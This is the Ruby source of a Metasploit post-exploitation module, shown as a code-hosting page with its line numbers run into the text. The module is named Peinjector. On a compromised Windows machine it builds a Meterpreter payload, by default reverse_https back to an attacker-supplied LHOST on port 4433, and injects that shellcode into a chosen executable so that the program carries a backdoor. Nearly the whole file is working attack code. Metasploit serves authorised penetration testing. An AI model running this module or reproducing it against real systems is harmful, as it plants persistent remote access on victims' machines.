Path: blob/master/modules/post/windows/manage/peinjector.rb
19721 views
require 'rex'12class MetasploitModule < Msf::Post34include Msf::Post::Common56def initialize(info = {})7super(8update_info(9info,10'Name' => 'Peinjector',11'Description' => %q{12This module will inject a specified windows payload into a target executable.13},14'License' => MSF_LICENSE,15'Author' => [ 'Maximiliano Tedesco <[email protected]>'],16'Platform' => [ 'win' ],17'SessionTypes' => [ 'meterpreter' ],18'Compat' => {19'Meterpreter' => {20'Commands' => %w[21peinjector_inject_shellcode22]23}24},25'Notes' => {26'Stability' => [CRASH_SERVICE_DOWN],27'SideEffects' => [CONFIG_CHANGES],28'Reliability' => []29}30)31)3233register_options(34[35OptString.new('PAYLOAD', [false, 'Windows Payload to inject into the targer executable.', 'windows/meterpreter/reverse_https']),36OptAddress.new('LHOST', [true, 'IP of host that will receive the connection from the payload.']),37OptInt.new('LPORT', [false, 'Port for Payload to connect to.', 4433]),38OptString.new('TARGETPE', [false, 'Path of the target executable to be injected']),39OptString.new('OPTIONS', [false, "Comma separated list of additional options for payload if needed in \'opt=val,opt=val\' format."])40]41)42end4344def run45session.core.use('peinjector')4647# syinfo is only on meterpreter sessions48hostname = sysinfo.nil? ? cmd_exec('hostname') : sysinfo['Computer']49print_status("Running module against #{hostname} (#{session.session_host})")5051# Check that the payload is a Windows one and on the list52if !session.framework.payloads.module_refnames.grep(/windows/).include?(datastore['PAYLOAD'])53print_error("The Payload specified #{datastore['PAYLOAD']} is not a valid for this system")54return55end5657# Set variables58pay_name = datastore['PAYLOAD']59lhost = datastore['LHOST']60lport = datastore['LPORT']61targetpe = datastore['TARGETPE']62opts = datastore['OPTIONS']6364# Create payload65payload = create_payload(pay_name, lhost, lport, opts)6667# Inject payload68inject_payload(payload, targetpe)69end7071# Create a payload given a name, lhost and lport, additional options72def create_payload(name, lhost, lport, opts = '')73pay = client.framework.payloads.create(name)74pay.datastore['LHOST'] = lhost75pay.datastore['LPORT'] = lport76pay.datastore['EXITFUNC'] = 'thread'77pay.available_space = 1.gigabyte # this is to generate a proper uuid and make the payload to work with the universal handler7879if !opts.blank?80opts.split(',').each do |o|81opt, val = o.split('=', 2)82pay.datastore[opt] = val83end84end85# Validate the options for the module86pay.options.validate(pay.datastore)87return pay88end8990def inject_payload(pay, targetpe)91print_status('Generating payload')92raw = pay.generate93param = {}9495if pay.arch.join == ARCH_X6496threaded_shellcode = client.peinjector.add_thread_x64(raw)97param[:isx64] = true98else99threaded_shellcode = client.peinjector.add_thread_x86(raw)100param[:isx64] = false101end102103param[:shellcode] = threaded_shellcode104param[:targetpe] = targetpe105param[:size] = threaded_shellcode.length106107print_status("Injecting #{pay.name} into the executable #{param[:targetpe]}")108client.peinjector.inject_shellcode(param)109print_good("Successfully injected payload into the executable: #{param[:targetpe]}")110rescue StandardError => e111print_error("Failed to Inject Payload to executable #{param[:targetpe]}!")112print_error(e.to_s)113end114end115116117